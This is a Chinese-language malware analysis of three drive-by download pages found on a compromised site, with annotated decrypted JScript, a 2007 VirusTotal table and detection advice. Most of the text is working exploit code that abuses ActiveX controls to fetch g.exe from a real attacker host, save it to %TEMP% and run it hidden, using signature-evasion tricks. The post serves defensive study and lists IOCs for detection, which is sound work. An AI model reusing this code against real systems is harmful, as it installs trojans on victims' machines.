|
该页面挂了三个所谓"vip"的加密网马(vip.htm、vip1.htm、vip2.htm),解密后的内容如下(注意:下面的下载地址和落地文件名是真实样本中的 IOC,分析时请在隔离环境中处理):
1、vip[1].htm
| 以下是代码片段: <!-- Stage 1 (vip[1].htm). The only active content is a DIV whose CSS cursor is fetched from the relative URL ah.c, so the browser loads that file as a cursor resource. NOTE(review): ah.c itself is not shown on this page; that it is a malformed animated cursor carrying an exploit is inferred from the pattern (a non-cursor extension, no script, nothing else on the page) and should be confirmed by pulling the file. --> <DIV style="CURSOR: url(ah.c)"></DIV> <!-- Trailer shared by all three pages: once the page has loaded, document.write("") implicitly reopens the document and blanks what is rendered, so a casual viewer sees an empty page after the cursor has already been requested. --> <script type="text/jscript">function init() { document.write("");}window.onload = init;</script> |
2、vip1[1].htm
| 以下是代码片段: <!-- Stage 2 (vip1[1].htm). What the written script does, in order: (1) creates an <object> with classid BD96C556-65A3-11D0-983A-00C04FC29E36 and uses its CreateObject method as a COM factory for Microsoft.XMLHTTP, ADODB.Stream (spelled "Ado"+"db.St"+"ream" to dodge plain string signatures) and Shell.Application; (2) issues a synchronous GET for http://baobao3.slsbg.com/g.exe; (3) writes the response body to a file named "Microsoft.com" in the browser's current directory (SaveToFile mode 2 = overwrite, stream type 1 = binary); (4) ShellExecute's that file with verb "open" and window style 0 (hidden). The whole chain sits in try/catch, so failure is silent. The unused var d=1 … var n=1 assignments are filler to break signature matching. NOTE(review): this CLSID is widely reported as the MDAC RDS.DataSpace control whose CreateObject was the MS06-014 issue; confirm against the CLSID registry before citing it. The leading "<" inside the URL string looks like a transcription artifact of this copy rather than part of the sample, and the line breaks of the original have been lost here (in JScript a bare <!-- opens a line comment, so the single-line form shown would not run as is); verify both against the raw file. Detection IOCs visible here: the download URL, the CLSID, the dropped filename Microsoft.com. --> <noscript> <iframe src=*></iframe> </noscript> <script language="JavaScript"> <!-- document.writeln("<script>var ailian,zhan;ailian=\"<http://baobao3.slsbg.com/g.exe\";zhan=\"Microsoft.com\";try{var ado=(document.createElement(\"object\"));var d=1;ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");var e=1;var xml=ado.CreateObject(\"Microsoft.XMLHTTP\",\"\");var f=1;var ln=\"Ado\";var lzn=\"db.St\";var an=\"ream\";var g=1;var as=ado.createobject(ln+lzn+an,\"\");var h=1;xml.Open(\"GET\",ailian,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(zhan,2);as.close();var shell=ado.createobject(\"Shell.Application\",\"\");shell.Shellexecute(zhan,\"\",\"\",\"open\",0);}catch(e){};</script\>"); //--> </script> <script type="text/jscript">function init() { document.write("");}window.onload = init;</script> |
3、vip2[1].htm
| 以下是代码片段: <!-- Stage 3 (vip2[1].htm). Same dropper as vip1 but generalised: the payload script is emitted line by line through document.writeln, and instead of one hard-coded control it walks a list of CLSIDs looking for any <object> that will hand back a WScript.Shell via CreateObject/GetObject. The download URL (http://baobao3.slsbg.com/g.exe) and the dropped names (Microsoft.com, Microsoft.vbs, both under %TEMP%) are the IOCs worth alerting on; the CLSID list doubles as a list of controls to check for on the host. Log() never attaches its <p> to the DOM, so it is a no-op progress marker. --> <noscript> <iframe src=*></iframe> </noscript> <script> document.writeln("<script language=\"javaScript\">"); document.writeln("ZhanLang=\"http://baobao3.slsbg.com/g.exe\""); document.writeln("ZhanLang1=\"Microsoft.com\""); document.writeln("ZhanLang2=\"Microsoft.vbs\""); document.writeln("ln=\"BD96C556-65A3-11D0-983A-00C04FC29E36\""); /* Log(): creates a <p> that is never inserted into the document; effectively a no-op. */ document.writeln("function Log(QQ7999327)"); document.writeln("{"); document.writeln(" var log=document.createElement(\'p\');"); document.writeln(" log.innerHTML=QQ7999327;"); document.writeln("}"); /* CreateO(o,n): tries six call shapes (CreateObject with 1/2/3 args, GetObject with 3 argument orders) on the ActiveX wrapper o until one returns an instance of ProgID n. Each attempt is wrapped in try/catch and goes through eval purely to avoid the literal method call appearing in the page text. */ document.writeln("function CreateO(o,n)"); document.writeln("{"); document.writeln(" var r=null;"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.CreateObject(n)\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" if (!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.CreateObject(n,\"\")\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if(!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.CreateObject(n,\"\",\"\")\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if (!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.GetObject(\"\",n)\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if (!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" eval(\'r=o.GetObject(n,\"\")\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if (!r)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); 
document.writeln(" eval(\'r=o.GetObject(n)\')"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" return(r);"); document.writeln("}"); /* Go(a): the dropper proper. Obtains WScript.Shell ("WScript.S"+"hell", again split to dodge signatures) and two ADODB.Stream objects through the compromised control a; reads %TEMP% from the process environment; builds a three-line VBScript that does CreateObject("Wscript.Shell").Run on %TEMP%\Microsoft.com; saves it as %TEMP%\Microsoft.vbs (SaveToFile mode 2 = overwrite); downloads g.exe with XMLHttpRequest / Microsoft.XMLHTTP / MSXML2.ServerXMLHTTP (first that works, synchronous GET); writes the body as a binary stream to %TEMP%\Microsoft.com; then runs the .vbs hidden (s.Run(Zhan,0)). NOTE(review): ip.WriteText=kn is an assignment to a method name, not a call, so whether the .vbs actually gets the script text depends on how the COM dispatch binding treats a property-put on WriteText; confirm in a sandbox before treating the .vbs contents as a reliable artifact. Any exception here propagates to the try in Exploit() and silently ends the chain. */ document.writeln("function Go(a)"); document.writeln("{"); document.writeln(" Log(\'\');"); document.writeln(" Zhong=\"WScript.S\";"); document.writeln(" ZhongJieZhe=Zhong;"); document.writeln(" var s=CreateO(a,ZhongJieZhe+\"hell\");"); document.writeln(" var o=CreateO(a,\"ADODB.Stream\");"); document.writeln(" var ip=CreateO(a,\"ADODB.Stream\");"); document.writeln(" var e=s.Environment(\"Process\");"); document.writeln(" Log(\'\');"); document.writeln(" var url=ZhanLang;"); document.writeln(" var Lang=e.Item(\"TEMP\")+\"\\\\\"+ZhanLang1;"); document.writeln(" var Zhan=e.Item(\"TEMP\")+\"\\\\\"+ZhanLang2;"); document.writeln(" var vip=null;"); document.writeln(" var kn;"); document.writeln(" kn=\"Set Shell = CreateObject(\\\"Wscript.Shell\\\")\";"); document.writeln(" kn=kn+\"\\n\"+\"Shell.Run(\\\"\"+Lang+\"\\\")\";"); document.writeln(" kn=kn+\"\\n\"+\"set Shell=Nothing\";"); document.writeln(" ip.Mode=3;"); document.writeln(" ip.Open();"); document.writeln(" ip.Charset = \"GB2312\";"); document.writeln(" ip.Position = ip.Size;"); document.writeln(" ip.WriteText=kn;"); document.writeln(" ip.SaveToFile(Zhan,2);"); document.writeln(" try"); document.writeln(" {"); document.writeln(" vip=new XMLHttpRequest();"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" vip=new ActiveXObject(\"Microsoft.XMLHTTP\");"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {"); document.writeln(" vip=new ActiveXObject(\"MSXML2.ServerXMLHTTP\");"); document.writeln(" }"); document.writeln(" }"); document.writeln(" if (!vip) return(0);"); document.writeln(" Log(\'\');"); document.writeln(" vip.open(\"GET\",url,false);"); document.writeln(" vip.send(null);"); 
document.writeln(" kn=vip.responseBody;"); document.writeln(" Log(\'\');"); document.writeln(" o.Type=1;"); document.writeln(" o.Mode=3;"); document.writeln(" o.Open();"); document.writeln(" o.Write(kn);"); document.writeln(" o.SaveToFile(Lang,2);"); document.writeln(" Log(\'\');"); document.writeln(" s.Run(Zhan,0);"); document.writeln("}"); /* Exploit(): walks the tt list until the null terminator. Entries starting with "{" are treated as CLSIDs and instantiated as <object classid="clsid:...">, anything else as a ProgID via new ActiveXObject (no such entry exists in this list). For each instance it asks CreateO for a WScript.Shell; the first control that yields one gets passed to Go() and the loop returns. Two entries can never work: '{ln}' is the literal string "{ln}" (the ln variable set above is not interpolated), and '{6e32070a-766d-4ee6-879c-c1fa91d2fc3}' has an 11-digit last group and is not a valid CLSID. Which real control each remaining CLSID names is not shown on this page; resolve them against the registry rather than guessing. */ document.writeln("function Exploit()"); document.writeln("{"); document.writeln(" var i=0;"); document.writeln(" var tt=new Array(\'{ln}\',\'{BD96C556-65A3-11D0-983A-00C04FC29E36}\',\'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}\',\'{0006F033-0000-0000-C000-000000000046}\',\'{0006F03A-0000-0000-C000-000000000046}\',\'{6e32070a-766d-4ee6-879c-c1fa91d2fc3}\',\'{6414512B-B978-451D-A0D8-FCFDF33E833C}\',\'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}\',\'{06723E09-F4C2-43c8-8358-09FCD1DB0766}\',\'{639F725F-1B2D-4831-A9FD-874847682010}\',\'{BA018599-1DB3-44f9-83B4-461454C84BF8}\',\'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}\',\'{E8CCCDDF-CA28-496b-B050-6C07C962476B}\',null);"); document.writeln("while (true)"); document.writeln(" { t=tt[i];"); document.writeln(" if (t==null)"); document.writeln(" {"); document.writeln(" return(0);"); document.writeln(" }"); document.writeln(" var a=null;"); document.writeln(" if (t.substring(0,1)==\'{\')"); document.writeln(" {"); document.writeln(" try{"); document.writeln(" a=document.createElement(\"object\");"); document.writeln(" a.setAttribute(\"classid\",\"clsid:\"+t.substring(1,t.length-1));"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" else"); document.writeln(" {"); document.writeln(" try{"); document.writeln(" a=new ActiveXObject(t);"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" if (a)"); document.writeln(" {"); document.writeln(" try"); document.writeln(" {"); document.writeln(" var b=CreateO(a,\"WScript.Shell\");"); document.writeln(" if (b)"); 
document.writeln(" {"); document.writeln(" Log(\'\');"); document.writeln(" Go(a);"); document.writeln(" return(0);"); document.writeln(" }"); document.writeln(" }"); document.writeln(" catch(e)"); document.writeln(" {}"); document.writeln(" }"); document.writeln(" i++;"); document.writeln(" }"); document.writeln(" Log(\'\');"); document.writeln("}"); /* Entry point: runs Exploit() as soon as the written script is parsed, i.e. before the page has finished loading. */ document.writeln(" Exploit()"); document.writeln(""); document.writeln("<\/script>"); </script> <!-- Same blanking trailer as the other two pages: document.write("") on load reopens the document and hides the page content from the viewer. --> <script type="text/jscript">function init() { document.write("");}window.onload = init;</script> |
将所挂的木马 g[1].exe(即上面三个脚本下载的 g.exe)上传到 http://www.virustotal.com/en/indexf.html,得到如下结果(扫描日期为 2007-05-30/31,下面的检出情况只代表当时):
| Antivirus | Version | Update | Result |
| AhnLab-V3 | 2007.5.30.0 | 05.30.2007 | Win-Trojan/Hupigon.Gen |
| AntiVir | 7.4.0.29 | 05.30.2007 | HEUR/Malware |
| Authentium | 4.93.8 | 05.23.2007 | could be infected with an unknown virus |
| Avast | 4.7.997.0 | 05.30.2007 | no virus found |
| AVG | 7.5.0.467 | 05.30.2007 | no virus found |
| BitDefender | 7.2 | 05.31.2007 | BehavesLike:Win32.ExplorerHijack |
| CAT-QuickHeal | 9.00 | 05.30.2007 | no virus found |
| ClamAV | devel-20070416 | 05.30.2007 | no virus found |
| DrWeb | 4.33 | 05.30.2007 | DLOADER.Trojan |
| eSafe | 7.0.15.0 | 05.30.2007 | suspicious Trojan/Worm |
| eTrust-Vet | 30.7.3678 | 05.30.2007 | no virus found |
| Ewido | 4.0 | 05.29.2007 | no virus found |
| FileAdvisor | 1 | 05.31.2007 | no virus found |
| Fortinet | 2.85.0.0 | 05.31.2007 | no virus found |
| F-Prot | 4.3.2.48 | 05.30.2007 | no virus found |
| F-Secure | 6.70.13030.0 | 05.30.2007 | no virus found |
| Ikarus | T3.1.1.8 | 05.30.2007 | Trojan.Win32.Delf.vb |
| Kaspersky | 4.0.2.24 | 05.31.2007 | no virus found |
| McAfee | 5042 | 05.30.2007 | no virus found |
| Microsoft | 1.2503 | 05.31.2007 | no virus found |
| NOD32v2 | 2299 | 05.30.2007 | probably a variant of Win32/Genetik |
| Norman | 5.80.02 | 05.30.2007 | no virus found |
| Panda | 9.0.0.4 | 05.30.2007 | Suspicious file |
| Prevx1 | V2 | 05.31.2007 | no virus found |
| Sophos | 4.18.0 | 05.28.2007 | no virus found |
| Sunbelt | 2.2.907.0 | 05.30.2007 | no virus found |
| Symantec | 10 | 05.31.2007 | no virus found |
| TheHacker | 6.1.6.126 | 05.30.2007 | no virus found |
| VBA32 | 3.12.0 | 05.30.2007 | suspected of Backdoor.GrayBird.1 (paranoid heuristics) |
| VirusBuster | 4.3.23:9 | 05.30.2007 | no virus found |
| Webwasher-Gateway | 6.0.1 | 05.31.2007 | Heuristic.Malware |
能绕过 Kaspersky、McAfee、AVG、Symantec、Microsoft 等杀毒软件的检测(上表 31 家引擎中只有 11 家报毒或报可疑,且多数是启发式/泛型判定),看来还是做了些免杀处理的。因此防御上不能只依赖杀软签名,应按脚本中可见的行为特征来检测和拦截:下载地址 baobao3.slsbg.com/g.exe、落地文件名 Microsoft.com / Microsoft.vbs(写入 %TEMP%)、以及脚本中枚举的那些 CLSID;对已打补丁或已设置 Kill Bit 的控件,这类网马无法取得 WScript.Shell,整条链就会在 try/catch 中静默失败。